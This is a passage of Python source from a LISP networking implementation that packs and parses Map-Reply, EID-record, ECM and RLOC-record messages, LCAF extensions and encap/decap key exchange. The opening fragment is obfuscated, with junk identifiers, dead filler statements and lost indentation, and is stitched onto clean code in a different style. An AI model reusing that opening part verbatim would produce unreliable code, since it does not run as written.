self . keys = [ None , Oo000O000 , None , None ]
if ( lisp_i_am_etr == False and lisp_i_am_rtr == False ) :
Oo000O000 . local_public_key = None
lprint ( "{} for {}" . format ( bold ( "Ignoring decap-keys" ,
False ) , red ( oo0o00OO , False ) ) )
elif ( Oo000O000 . remote_public_key != None ) :
if ( O0OOOo000 ) :
lprint ( "{} for RLOC {}" . format ( bold ( "New decap-keying" , False ) ,
# IiII * OoooooooOO . I1ii11iIi11i % Ii1I
red ( oo0o00OO , False ) ) )
if 51 - 51: I1ii11iIi11i % OoooooooOO - OoooooooOO . I11i
Oo000O000 . compute_shared_key ( "decap" )
Oo000O000 . add_key_by_rloc ( oo0o00OO , False )
if 97 - 97: i1IIi % I11i . o0oOOo0O0Ooo * I1IiiI % II111iiii
if 41 - 41: I11i . I1ii11iIi11i
if 69 - 69: O0 * ooOoO0o % ooOoO0o / oO0o
if 2 - 2: oO0o % OoO0O00
self . itr_rlocs . append ( I11iiII1I1111 )
oOOoo0000o -= 1
if 3 - 3: oO0o / OoO0O00 % i11iIiiIii
if 26 - 26: ooOoO0o . I1Ii111 / II111iiii % Ii1I
Iiiii = struct . calcsize ( "BBH" )
if ( len ( packet ) < Iiiii ) : return ( None )
if 82 - 82: OOooOOo % O0 % iIii1I11I1II1 % IiII + i11iIiiIii
IIIiIiIIII1i1 , OO00O , O0ooo0 = struct . unpack ( "BBH" , packet [ : Iiiii ] )
self . subscribe_bit = ( IIIiIiIIII1i1 & 0x80 )
self . target_eid . afi = socket . ntohs ( O0ooo0 )
packet = packet [ Iiiii : : ]
if 64 - 64: i1IIi / IiII . IiII - I1Ii111 % OOooOOo . II111iiii
self . target_eid . mask_len = OO00O
if ( self . target_eid . afi == LISP_AFI_LCAF ) :
packet , O0Ooo00oo = self . target_eid . lcaf_decode_eid ( packet )
if ( packet == None ) : return ( None )
if ( O0Ooo00oo ) : self . target_group = O0Ooo00oo
else :
packet = self . target_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = packet [ Iiiii : : ]
if 60 - 60: oO0o
return ( packet )
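# A small sketch of the ITR-RLOC count encoding handled in decode() above
# (hedged: standalone arithmetic, not executed by this module).  The 5-bit
# wire field stores one less than the number of ITR-RLOC entries, which is
# why the loop above runs itr_rloc_count + 1 times:
#
#   wire_field = 0                  # smallest field value ...
#   assert wire_field + 1 == 1      # ... means one ITR-RLOC entry
#   wire_field = 0x1f               # largest field value ...
#   assert wire_field + 1 == 32     # ... allows up to 32 ITR-RLOCs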
    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.target_eid, self.target_group))

    # The 128-bit xtr-id is carried as two 64-bit quantities, each
    # byte-swapped for the wire.
    def encode_xtr_id(self, packet):
        upper = self.xtr_id >> 64
        lower = self.xtr_id & 0xffffffffffffffff
        upper = byte_swap_64(upper)
        lower = byte_swap_64(lower)
        packet += struct.pack("QQ", upper, lower)
        return(packet)

    def decode_xtr_id(self, packet):
        size = struct.calcsize("QQ")
        if (len(packet) < size): return(None)
        packet = packet[len(packet) - size::]
        upper, lower = struct.unpack("QQ", packet[:size])
        upper = byte_swap_64(upper)
        lower = byte_swap_64(lower)
        self.xtr_id = (upper << 64) | lower
        return(True)
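# A round-trip sketch for the two methods above (hedged: `mr` is a
# hypothetical instance of this class, and byte_swap_64() is assumed to
# reverse the byte order of a 64-bit integer, so applying it on encode
# and again on decode is symmetric):
#
#   mr.xtr_id = 0x00112233445566778899aabbccddeeff
#   pkt = mr.encode_xtr_id("")       # appends 16 bytes
#   mr.decode_xtr_id(pkt)            # reads the *last* 16 bytes
#   assert mr.xtr_id == 0x00112233445566778899aabbccddeeff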
class lisp_map_reply():
    def __init__(self):
        self.rloc_probe = False
        self.echo_nonce_capable = False
        self.security = False
        self.record_count = 0
        self.hop_count = 0
        self.nonce = 0
        self.keys = None

    def print_map_reply(self):
        line = ("{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " +
            "nonce: 0x{}")
        lprint(line.format(bold("Map-Reply", False),
            "R" if self.rloc_probe else "r",
            "E" if self.echo_nonce_capable else "e",
            "S" if self.security else "s", self.hop_count, self.record_count,
            lisp_hex_string(self.nonce)))

    def encode(self):
        # First 32-bit word: message type, flag bits, hop-count, and
        # record-count.
        first_long = (LISP_MAP_REPLY << 28) | self.record_count
        first_long |= self.hop_count << 8
        if (self.rloc_probe): first_long |= 0x08000000
        if (self.echo_nonce_capable): first_long |= 0x04000000
        if (self.security): first_long |= 0x02000000

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        return(packet)

    def decode(self, packet):
        packet_format = "I"
        size = struct.calcsize(packet_format)
        if (len(packet) < size): return(None)

        first_long = struct.unpack(packet_format, packet[:size])
        first_long = first_long[0]
        packet = packet[size::]

        packet_format = "Q"
        size = struct.calcsize(packet_format)
        if (len(packet) < size): return(None)

        nonce = struct.unpack(packet_format, packet[:size])
        packet = packet[size::]

        first_long = socket.ntohl(first_long)
        self.rloc_probe = True if (first_long & 0x08000000) else False
        self.echo_nonce_capable = True if (first_long & 0x04000000) else False
        self.security = True if (first_long & 0x02000000) else False
        self.hop_count = (first_long >> 8) & 0xff
        self.record_count = first_long & 0xff
        self.nonce = nonce[0]

        # If we initiated a lisp-crypto key exchange with this nonce,
        # claim the keys and stop tracking them by nonce.
        if (self.nonce in lisp_crypto_keys_by_nonce):
            self.keys = lisp_crypto_keys_by_nonce[self.nonce]
            self.keys[1].delete_key_by_nonce(self.nonce)

        return(packet)
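# A minimal sketch of the header word layout used by encode()/decode()
# above (hedged: standalone arithmetic, assuming only that LISP_MAP_REPLY
# is 2 as in the LISP message-type registry):
#
#   first_long = (2 << 28) | (64 << 8) | 1      # type 2, 64 hops, 1 record
#   first_long |= 0x08000000                    # set the RLOC-probe bit
#   assert (first_long >> 28) == 2
#   assert bool(first_long & 0x08000000) == True
#   assert ((first_long >> 8) & 0xff) == 64 and (first_long & 0xff) == 1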
class lisp_eid_record():
    def __init__(self):
        self.record_ttl = 0
        self.rloc_count = 0
        self.action = 0
        self.authoritative = False
        self.ddt_incomplete = False
        self.signature_count = 0
        self.map_version = 0
        self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)

    def print_prefix(self):
        if (self.group.is_null()):
            return(green(self.eid.print_prefix(), False))
        return(green(self.eid.print_sg(self.group), False))

    def print_ttl(self):
        ttl = self.record_ttl
        if (self.record_ttl & 0x80000000):
            ttl = str(self.record_ttl & 0x7fffffff) + " secs"
        elif ((ttl % 60) == 0):
            ttl = str(ttl / 60) + " hours"
        else:
            ttl = str(ttl) + " mins"
        return(ttl)

    def store_ttl(self):
        # TTLs are kept internally in seconds; the wire value is minutes
        # unless the high-order bit says it is already in seconds.
        ttl = self.record_ttl * 60
        if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
        return(ttl)
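# A small sketch of the TTL encodings handled above (hedged: standalone
# arithmetic mirroring store_ttl(), not called by this module):
#
#   rec = lisp_eid_record()
#   rec.record_ttl = 90                    # wire TTLs are in minutes
#   assert rec.store_ttl() == 90 * 60      # stored internally as seconds
#   rec.record_ttl = 0x80000000 | 10       # high bit: value is in seconds
#   assert rec.store_ttl() == 10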
    def print_record(self, indent, ddt):
        incomplete = ""
        sig_count = ""
        action_str = bold("invalid-action", False)
        if (ddt):
            if (self.action < len(lisp_map_referral_action_string)):
                action_str = lisp_map_referral_action_string[self.action]
                action_str = bold(action_str, False)

            incomplete = (", " + bold("ddt-incomplete", False)) if \
                self.ddt_incomplete else ""
            sig_count = (", sig-count: " + str(self.signature_count)) if \
                (self.signature_count != 0) else ""
        else:
            if (self.action < len(lisp_map_reply_action_string)):
                action_str = lisp_map_reply_action_string[self.action]
                if (self.action != LISP_NO_ACTION):
                    action_str = bold(action_str, False)

        afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
        line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
            "{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")

        lprint(line.format(indent, self.print_ttl(), self.rloc_count,
            action_str, "auth" if (self.authoritative is True) else
            "non-auth", incomplete, sig_count, self.map_version, afi,
            green(self.print_prefix(), False)))

    def encode(self):
        action_flags = self.action << 13
        if (self.authoritative): action_flags |= 0x1000
        if (self.ddt_incomplete): action_flags |= 0x800

        afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
        if (afi < 0): afi = LISP_AFI_LCAF
        sg = (self.group.is_null() == False)
        if (sg): afi = LISP_AFI_LCAF

        version_field = (self.signature_count << 12) | self.map_version
        mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len

        packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
            self.rloc_count, mask_len, socket.htons(action_flags),
            socket.htons(version_field), socket.htons(afi))

        # (S, G) EIDs are encoded in a multicast-info LCAF.
        if (sg):
            packet += self.eid.lcaf_encode_sg(self.group)
            return(packet)

        # Geo-coord EIDs replace the AFI just written with a geo LCAF.
        if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
            packet = packet[0:-2]
            packet += self.eid.address.encode_geo()
            return(packet)

        # Nonzero instance-ids are encoded in an instance-id LCAF.
        if (afi == LISP_AFI_LCAF):
            packet += self.eid.lcaf_encode_iid()
            return(packet)

        # Plain AFI-encoded EID.
        packet += self.eid.pack_address()
        return(packet)

    def decode(self, packet):
        packet_format = "IBBHHH"
        size = struct.calcsize(packet_format)
        if (len(packet) < size): return(None)

        self.record_ttl, self.rloc_count, self.eid.mask_len, action_flags, \
            self.map_version, self.eid.afi = \
            struct.unpack(packet_format, packet[:size])

        self.record_ttl = socket.ntohl(self.record_ttl)
        action_flags = socket.ntohs(action_flags)
        self.action = (action_flags >> 13) & 0x7
        self.authoritative = True if ((action_flags >> 12) & 1) else False
        self.ddt_incomplete = True if ((action_flags >> 11) & 1) else False
        self.map_version = socket.ntohs(self.map_version)
        self.signature_count = self.map_version >> 12
        self.map_version = self.map_version & 0xfff
        self.eid.afi = socket.ntohs(self.eid.afi)
        self.eid.instance_id = 0
        packet = packet[size::]

        # LCAF-encoded EIDs may carry an instance-id and/or an (S, G) pair.
        if (self.eid.afi == LISP_AFI_LCAF):
            packet, group = self.eid.lcaf_decode_eid(packet)
            if (group): self.group = group
            self.group.instance_id = self.eid.instance_id
            return(packet)

        packet = self.eid.unpack_address(packet)
        return(packet)

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))
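# A sketch of the action/authoritative/ddt-incomplete field packing used
# by encode()/decode() above (hedged: standalone round trip, no wire I/O):
#
#   rec = lisp_eid_record()
#   rec.action = 3                      # e.g. the drop action
#   rec.authoritative = True
#   flags = rec.action << 13
#   if (rec.authoritative): flags |= 0x1000
#   assert ((flags >> 13) & 0x7, bool((flags >> 12) & 1)) == (3, True)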
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
    def __init__(self, sport):
        self.security = False
        self.ddt = False
        self.to_etr = False
        self.to_ms = False
        self.length = 0
        self.ttl = LISP_DEFAULT_ECM_TTL
        self.protocol = LISP_UDP_PROTOCOL
        self.ip_checksum = 0
        self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.udp_sport = sport
        self.udp_dport = LISP_CTRL_PORT
        self.udp_checksum = 0
        self.udp_length = 0
        self.afi = LISP_AFI_NONE

    def print_ecm(self):
        line = ("{} -> flags: {}{}{}{}, " +
            "inner IP: {} -> {}, inner UDP: {} -> {}")
        lprint(line.format(bold("ECM", False), "S" if self.security else "s",
            "D" if self.ddt else "d", "E" if self.to_etr else "e",
            "M" if self.to_ms else "m",
            green(self.source.print_address(), False),
            green(self.dest.print_address(), False), self.udp_sport,
            self.udp_dport))

    def encode(self, packet, inner_source, inner_dest):
        # Compute inner UDP and IP lengths.  The IPv4 total-length covers
        # the 20-byte IP header; the IPv6 payload-length does not.
        self.udp_length = len(packet) + 8
        self.source = inner_source
        self.dest = inner_dest
        if (inner_dest.is_ipv4()):
            self.afi = LISP_AFI_IPV4
            self.length = self.udp_length + 20
        if (inner_dest.is_ipv6()):
            self.afi = LISP_AFI_IPV6
            self.length = self.udp_length

        # First 32-bit word: ECM type plus flag bits.
        first_long = (LISP_ECM << 28)
        if (self.security): first_long |= 0x08000000
        if (self.ddt): first_long |= 0x04000000
        if (self.to_etr): first_long |= 0x02000000
        if (self.to_ms): first_long |= 0x01000000

        ecm = struct.pack("I", socket.htonl(first_long))

        # Build the inner IP header.
        ip = ""
        if (self.afi == LISP_AFI_IPV4):
            ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
                0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
            ip += self.source.pack_address()
            ip += self.dest.pack_address()
            ip = lisp_ip_checksum(ip)
        if (self.afi == LISP_AFI_IPV6):
            ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
                self.protocol, self.ttl)
            ip += self.source.pack_address()
            ip += self.dest.pack_address()

        # Build the inner UDP header.
        sport = socket.htons(self.udp_sport)
        dport = socket.htons(self.udp_dport)
        udp_len = socket.htons(self.udp_length)
        checksum = socket.htons(self.udp_checksum)
        udp = struct.pack("HHHH", sport, dport, udp_len, checksum)
        return(ecm + ip + udp)

    def decode(self, packet):
        # Decode the 4-byte ECM header.
        packet_format = "I"
        size = struct.calcsize(packet_format)
        if (len(packet) < size): return(None)

        first_long = struct.unpack(packet_format, packet[:size])

        first_long = socket.ntohl(first_long[0])
        self.security = True if (first_long & 0x08000000) else False
        self.ddt = True if (first_long & 0x04000000) else False
        self.to_etr = True if (first_long & 0x02000000) else False
        self.to_ms = True if (first_long & 0x01000000) else False
        packet = packet[size::]

        # Decode the inner IP header; the version nibble selects v4 or v6.
        if (len(packet) < 1): return(None)
        version = struct.unpack("B", packet[0:1])[0]
        version = version >> 4

        if (version == 4):
            size = struct.calcsize("HHIBBH")
            if (len(packet) < size): return(None)

            x, length, x, ttl, protocol, checksum = struct.unpack("HHIBBH",
                packet[:size])
            self.length = socket.ntohs(length)
            self.ttl = ttl
            self.protocol = protocol
            self.ip_checksum = socket.ntohs(checksum)
            self.source.afi = self.dest.afi = LISP_AFI_IPV4

            # Zero out the IP header checksum field in the buffer.
            zero = struct.pack("H", 0)
            offset = struct.calcsize("HHIBB")
            csum_size = struct.calcsize("H")
            packet = packet[:offset] + zero + packet[offset + csum_size:]

            packet = packet[size::]
            packet = self.source.unpack_address(packet)
            if (packet == None): return(None)
            packet = self.dest.unpack_address(packet)
            if (packet == None): return(None)

        if (version == 6):
            size = struct.calcsize("IHBB")
            if (len(packet) < size): return(None)

            x, length, protocol, ttl = struct.unpack("IHBB", packet[:size])
            self.length = socket.ntohs(length)
            self.protocol = protocol
            self.ttl = ttl
            self.source.afi = self.dest.afi = LISP_AFI_IPV6

            packet = packet[size::]
            packet = self.source.unpack_address(packet)
            if (packet == None): return(None)
            packet = self.dest.unpack_address(packet)
            if (packet == None): return(None)

        self.source.mask_len = self.source.host_mask_len()
        self.dest.mask_len = self.dest.host_mask_len()

        # Decode the inner UDP header.
        size = struct.calcsize("HHHH")
        if (len(packet) < size): return(None)

        sport, dport, udp_len, checksum = struct.unpack("HHHH", packet[:size])
        self.udp_sport = socket.ntohs(sport)
        self.udp_dport = socket.ntohs(dport)
        self.udp_length = socket.ntohs(udp_len)
        self.udp_checksum = socket.ntohs(checksum)
        packet = packet[size::]
        return(packet)
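# A sketch of the ECM first-word layout used above (hedged: standalone
# arithmetic, assuming only that LISP_ECM is 8 per the LISP message-type
# registry):
#
#   first_long = (8 << 28) | 0x02000000     # ECM with the to-etr bit set
#   assert (first_long >> 28) == 8
#   assert bool(first_long & 0x02000000)    # to-etr set
#   assert not (first_long & 0x01000000)    # to-ms clear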
class lisp_rloc_record():
    def __init__(self):
        self.priority = 0
        self.weight = 0
        self.mpriority = 0
        self.mweight = 0
        self.local_bit = False
        self.probe_bit = False
        self.reach_bit = False
        self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.geo = None
        self.elp = None
        self.rle = None
        self.json = None
        self.rloc_name = None
        self.keys = None
    def print_rloc_name(self, cour=False):
        if (self.rloc_name == None): return("")
        rloc_name = self.rloc_name
        if (cour): rloc_name = lisp_print_cour(rloc_name)
        return('rloc-name: {}'.format(blue(rloc_name, cour)))

    def print_record(self, indent):
        rloc_str = self.print_rloc_name()
        if (rloc_str != ""): rloc_str = ", " + rloc_str
        geo_str = ""
        if (self.geo):
            name = ""
            if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
            geo_str = ", geo: {}{}".format(name, self.geo.print_geo())

        elp_str = ""
        if (self.elp):
            name = ""
            if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
            elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))

        rle_str = ""
        if (self.rle):
            name = ""
            if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
            rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
                True))

        json_str = ""
        if (self.json):
            name = ""
            if (self.json.json_name):
                name = "'{}' ".format(self.json.json_name)
            json_str = ", json: {}".format(self.json.print_json(False))

        security_str = ""
        if (self.rloc.is_null() == False and self.keys and self.keys[1]):
            security_str = ", " + self.keys[1].print_keys()

        line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: " +
            "{}{}{}{}{}{}{}")
        lprint(line.format(indent, self.print_flags(), self.priority,
            self.weight, self.mpriority, self.mweight, self.rloc.afi,
            red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
            elp_str, rle_str, json_str, security_str))

    def print_flags(self):
        return("{}{}{}".format("L" if self.local_bit else "l",
            "P" if self.probe_bit else "p", "R" if self.reach_bit else "r"))
    def store_rloc_entry(self, rloc_entry):
        rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
            else rloc_entry.translated_rloc
        self.rloc.copy_address(rloc)

        if (rloc_entry.rloc_name):
            self.rloc_name = rloc_entry.rloc_name

        # Geo, ELP, RLE, and JSON may be stored inline or referenced by
        # name from their respective configured lists.
        if (rloc_entry.geo):
            self.geo = rloc_entry.geo
        else:
            name = rloc_entry.geo_name
            if (name and name in lisp_geo_list):
                self.geo = lisp_geo_list[name]

        if (rloc_entry.elp):
            self.elp = rloc_entry.elp
        else:
            name = rloc_entry.elp_name
            if (name and name in lisp_elp_list):
                self.elp = lisp_elp_list[name]

        if (rloc_entry.rle):
            self.rle = rloc_entry.rle
        else:
            name = rloc_entry.rle_name
            if (name and name in lisp_rle_list):
                self.rle = lisp_rle_list[name]

        if (rloc_entry.json):
            self.json = rloc_entry.json
        else:
            name = rloc_entry.json_name
            if (name and name in lisp_json_list):
                self.json = lisp_json_list[name]

        self.priority = rloc_entry.priority
        self.weight = rloc_entry.weight
        self.mpriority = rloc_entry.mpriority
        self.mweight = rloc_entry.mweight
    def encode_json(self, lisp_json):
        json_string = lisp_json.json_string
        kid = 0
        if (lisp_json.json_encrypted):
            kid = (lisp_json.json_key_id << 5) | 0x02

        lcaf_type = LISP_LCAF_JSON_TYPE
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        addr_len = self.rloc.addr_length() + 2

        lcaf_len = socket.htons(len(json_string) + addr_len)
        json_len = socket.htons(len(json_string))
        packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
            lcaf_len, json_len)
        packet += json_string

        # Only telemetry JSON carries a trailing RLOC address; otherwise
        # an AFI of 0 is appended.
        if (lisp_is_json_telemetry(json_string)):
            packet += struct.pack("H", socket.htons(self.rloc.afi))
            packet += self.rloc.pack_address()
        else:
            packet += struct.pack("H", 0)

        return(packet)
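# A sketch of the JSON LCAF length fields packed above (hedged:
# standalone arithmetic; a 4-byte IPv4 RLOC is assumed, so addr_length()
# would return 4):
#
#   json_string = '{"type":"telemetry"}'
#   addr_len = 4 + 2                        # address plus its AFI field
#   lcaf_len = len(json_string) + addr_len  # LCAF payload length
#   json_len = len(json_string)             # explicit JSON length field
#   assert lcaf_len == json_len + 6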
    def encode_lcaf(self):
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        geo_lcaf = ""
        if (self.geo):
            geo_lcaf = self.geo.encode_geo()

        elp_lcaf = ""
        if (self.elp):
            elp_nodes = ""
            for elp_node in self.elp.elp_nodes:
                afi = socket.htons(elp_node.address.afi)
                flags = 0
                if (elp_node.eid): flags |= 0x4
                if (elp_node.probe): flags |= 0x2
                if (elp_node.strict): flags |= 0x1
                flags = socket.htons(flags)
                elp_nodes += struct.pack("HH", flags, afi)
                elp_nodes += elp_node.address.pack_address()

            elp_len = socket.htons(len(elp_nodes))
            elp_lcaf = struct.pack("HBBBBH", lcaf_afi, 0, 0,
                LISP_LCAF_ELP_TYPE, 0, elp_len)
            elp_lcaf += elp_nodes

        rle_lcaf = ""
        if (self.rle):
            rle_nodes = ""
            for rle_node in self.rle.rle_nodes:
                afi = socket.htons(rle_node.address.afi)
                rle_nodes += struct.pack("HBBH", 0, 0, rle_node.level, afi)
                rle_nodes += rle_node.address.pack_address()
                if (rle_node.rloc_name):
                    rle_nodes += struct.pack("H", socket.htons(LISP_AFI_NAME))
                    rle_nodes += rle_node.rloc_name + "\0"

            rle_len = socket.htons(len(rle_nodes))
            rle_lcaf = struct.pack("HBBBBH", lcaf_afi, 0, 0,
                LISP_LCAF_RLE_TYPE, 0, rle_len)
            rle_lcaf += rle_nodes

        json_lcaf = ""
        if (self.json):
            json_lcaf = self.encode_json(self.json)

        security_lcaf = ""
        if (self.rloc.is_null() == False and self.keys and self.keys[1]):
            security_lcaf = self.keys[1].encode_lcaf(self.rloc)

        name = ""
        if (self.rloc_name):
            name += struct.pack("H", socket.htons(LISP_AFI_NAME))
            name += self.rloc_name + "\0"

        # Wrap the RLOC address plus all extensions in an AFI-List LCAF.
        lcaf_len = len(geo_lcaf) + len(elp_lcaf) + len(rle_lcaf) + \
            len(security_lcaf) + 2 + len(json_lcaf) + \
            self.rloc.addr_length() + len(name)

        lcaf_len = socket.htons(lcaf_len)
        lcaf = struct.pack("HBBBBHH", lcaf_afi, 0, 0,
            LISP_LCAF_AFI_LIST_TYPE, 0, lcaf_len, socket.htons(self.rloc.afi))
        lcaf += self.rloc.pack_address()
        return(lcaf + name + geo_lcaf + elp_lcaf + rle_lcaf +
            security_lcaf + json_lcaf)
    def encode(self):
        flags = 0
        if (self.local_bit): flags |= 0x0004
        if (self.probe_bit): flags |= 0x0002
        if (self.reach_bit): flags |= 0x0001

        packet = struct.pack("BBBBHH", self.priority, self.weight,
            self.mpriority, self.mweight, socket.htons(flags),
            socket.htons(self.rloc.afi))

        # Any extended data (geo/elp/rle/keys/name/json) replaces the
        # 2-byte AFI just written with an LCAF encoding.
        if (self.geo or self.elp or self.rle or self.keys or
            self.rloc_name or self.json):
            packet = packet[0:-2] + self.encode_lcaf()
        else:
            packet += self.rloc.pack_address()

        return(packet)
    def decode_lcaf(self, packet, nonce, ms_json_encrypt):
        packet_format = "HBBBBH"
        size = struct.calcsize(packet_format)
        if (len(packet) < size): return(None)

        afi, rsvd, flags, lcaf_type, kid, lcaf_len = struct.unpack(
            packet_format, packet[:size])

        lcaf_len = socket.ntohs(lcaf_len)
        packet = packet[size::]
        if (lcaf_len > len(packet)): return(None)

        if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):

            # AFI-List LCAF: an RLOC address optionally preceded by a
            # distinguished name, or a nested LCAF.
            while (lcaf_len > 0):
                packet_format = "H"
                size = struct.calcsize(packet_format)
                if (lcaf_len < size): return(None)

                packet_len = len(packet)
                afi = struct.unpack(packet_format, packet[:size])[0]
                afi = socket.ntohs(afi)

                if (afi == LISP_AFI_LCAF):
                    packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
                    if (packet == None): return(None)
                else:
                    packet = packet[size::]
                    self.rloc_name = None
                    if (afi == LISP_AFI_NAME):
                        packet, rloc_name = lisp_decode_dist_name(packet)
                        self.rloc_name = rloc_name
                    else:
                        self.rloc.afi = afi
                        packet = self.rloc.unpack_address(packet)
                        if (packet == None): return(None)
                        self.rloc.mask_len = self.rloc.host_mask_len()

                lcaf_len -= packet_len - len(packet)

        elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):

            # Geo-Coordinates LCAF.
            geo = lisp_geo("")
            packet = geo.decode_geo(packet, lcaf_len, kid)
            if (packet == None): return(None)
            self.geo = geo

        elif (lcaf_type == LISP_LCAF_JSON_TYPE):
            encrypted = kid & 0x02

            # JSON LCAF: 2-byte JSON length, the JSON string, then an AFI
            # that is nonzero only for telemetry, where the RLOC follows.
            packet_format = "H"
            size = struct.calcsize(packet_format)
            if (lcaf_len < size): return(None)

            json_len = struct.unpack(packet_format, packet[:size])[0]
            json_len = socket.ntohs(json_len)
            if (lcaf_len < size + json_len): return(None)

            packet = packet[size::]
            self.json = lisp_json("", packet[0:json_len], encrypted,
                ms_json_encrypt)
            packet = packet[json_len::]

            afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
            packet = packet[2::]

            if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
                self.rloc.afi = afi
                packet = self.rloc.unpack_address(packet)

        elif (lcaf_type == LISP_LCAF_ELP_TYPE):

            # Explicit-Locator-Path LCAF.
            elp = lisp_elp(None)
            elp.elp_nodes = []
            while (lcaf_len > 0):
                flags, afi = struct.unpack("HH", packet[:4])

                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF): return(None)

                elp_node = lisp_elp_node()
                elp.elp_nodes.append(elp_node)

                flags = socket.ntohs(flags)
                elp_node.eid = (flags & 0x4)
                elp_node.probe = (flags & 0x2)
                elp_node.strict = (flags & 0x1)
                elp_node.address.afi = afi
                elp_node.address.mask_len = elp_node.address.host_mask_len()
                packet = elp_node.address.unpack_address(packet[4::])
                lcaf_len -= elp_node.address.addr_length() + 4

            elp.select_elp_node()
            self.elp = elp

        elif (lcaf_type == LISP_LCAF_RLE_TYPE):

            # Replication-List-Entry LCAF.
            rle = lisp_rle(None)
            rle.rle_nodes = []
            while (lcaf_len > 0):
                x, rsvd, level, afi = struct.unpack("HBBH", packet[:6])

                afi = socket.ntohs(afi)
                if (afi == LISP_AFI_LCAF): return(None)

                rle_node = lisp_rle_node()
                rle.rle_nodes.append(rle_node)

                rle_node.level = level
                rle_node.address.afi = afi
                rle_node.address.mask_len = rle_node.address.host_mask_len()
                packet = rle_node.address.unpack_address(packet[6::])

                lcaf_len -= rle_node.address.addr_length() + 6
                if (lcaf_len >= 2):
                    afi = struct.unpack("H", packet[:2])[0]
                    if (socket.ntohs(afi) == LISP_AFI_NAME):
                        packet = packet[2::]
                        packet, rle_node.rloc_name = \
                            lisp_decode_dist_name(packet)

                        if (packet == None): return(None)
                        lcaf_len -= len(rle_node.rloc_name) + 1 + 2

            self.rle = rle
            self.rle.build_forwarding_list()

        elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):

            # Security LCAF carrying public keys.  Peek at the cipher
            # suite first so the right lisp_keys() variant does the decode.
            orig_packet = packet
            probe_keys = lisp_keys(1)
            packet = probe_keys.decode_lcaf(orig_packet, lcaf_len, False)
            if (packet == None): return(None)

            cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
            if (probe_keys.cipher_suite in cs_list):
                if (probe_keys.cipher_suite == LISP_CS_25519_CBC):
                    key = lisp_keys(1, do_poly=False, do_chacha=False)
                if (probe_keys.cipher_suite == LISP_CS_25519_CHACHA):
                    key = lisp_keys(1, do_poly=True, do_chacha=True)
            else:
                key = lisp_keys(1, do_poly=False, do_chacha=False)

            packet = key.decode_lcaf(orig_packet, lcaf_len, False)
            if (packet == None): return(None)

            if (len(packet) < 2): return(None)
            afi = struct.unpack("H", packet[:2])[0]
            self.rloc.afi = socket.ntohs(afi)
            if (len(packet) < self.rloc.addr_length()): return(None)
            packet = self.rloc.unpack_address(packet[2::])
            if (packet == None): return(None)
            self.rloc.mask_len = self.rloc.host_mask_len()

            if (self.rloc.is_null()): return(packet)

            rloc_name = self.rloc_name
            if (rloc_name): rloc_name = blue(self.rloc_name, False)

            # Use stored encap key state when we have it; otherwise
            # compute a shared secret from the supplied public key.
            stored_key = self.keys[1] if self.keys else None
            if (stored_key == None):
                if (key.remote_public_key == None):
                    string = bold("No remote encap-public-key supplied",
                        False)
                    lprint(" {} for {}".format(string, rloc_name))
                    key = None
                else:
                    string = bold("New encap-keying with new state", False)
                    lprint(" {} for {}".format(string, rloc_name))
                    key.compute_shared_key("encap")

            if (stored_key):
                if (key.remote_public_key == None):
                    key = None
                    string = bold("Remote encap-unkeying occurred", False)
                    lprint(" {} for {}".format(string, rloc_name))
                elif (stored_key.compare_keys(key)):
                    key = stored_key
                    lprint(" Maintain stored encap-keys for {}".format(
                        rloc_name))
                else:
                    if (stored_key.remote_public_key == None):
                        string = "New encap-keying for existing state"
                    else:
                        string = "Remote encap-rekeying"
                    lprint(" {} for {}".format(bold(string, False),
                        rloc_name))
                    stored_key.remote_public_key = key.remote_public_key
                    stored_key.compute_shared_key("encap")
                    key = stored_key

            self.keys = [None, key, None, None]

        else:

            # Unknown or unhandled LCAF type: skip over it.
            packet = packet[lcaf_len::]

        return(packet)
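# A sketch of the RLE name accounting in decode_lcaf() above (hedged:
# standalone arithmetic).  A distinguished-name field costs its text, a
# NUL terminator, and the 2-byte LISP_AFI_NAME field that introduced it:
#
#   rloc_name = "core-rtr-1"
#   consumed = len(rloc_name) + 1 + 2
#   assert consumed == 13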
if 22 - 22: OoO0O00 / o0oOOo0O0Ooo
